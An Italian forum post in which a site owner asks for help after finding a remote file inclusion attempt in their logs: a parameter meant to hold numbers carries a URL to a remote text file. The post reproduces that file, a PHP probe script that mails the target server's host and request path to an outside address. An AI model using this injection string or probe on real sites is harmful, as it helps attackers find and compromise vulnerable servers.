Salve
mi serve un aiuto per capire cosa è successo.
Semplificando, nel sito, ho 2 pagine PHP che si richiamano tramite metodo POST, viene passata una variabile K che contiene una stringa fatta di soli numeri.
Le stringhe vengono memorizzate per calcoli statistici.
Analizzando gli accessi mi trovo il seguente valore anomalo:
K=http://swiatodziezy.com/libraries/inside.txt?
e se ci clicco mi appare il contenuto del file di testo:
Codice PHP:
<?php
//=================================
//
// scan - [RiCArDiM] - inb0x hotmail v1.0
//
//
//
//
//
// priv8 file
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "dkfft";
$email1 = "kazzu.237@gmail.com";
$headers .= "From:dkfft.com<$email>\r\n";
$html = '=p';
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1";
if(mail($email1, $assunto, $html . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "Opa spamei";
exit();
}
else{
echo "Opa";
exit();
}
?>
Sicuramente hanno cercato di fare qualcosa... avete idea di cosa?
Grazie per eventuali suggerimenti
Rispondi quotando
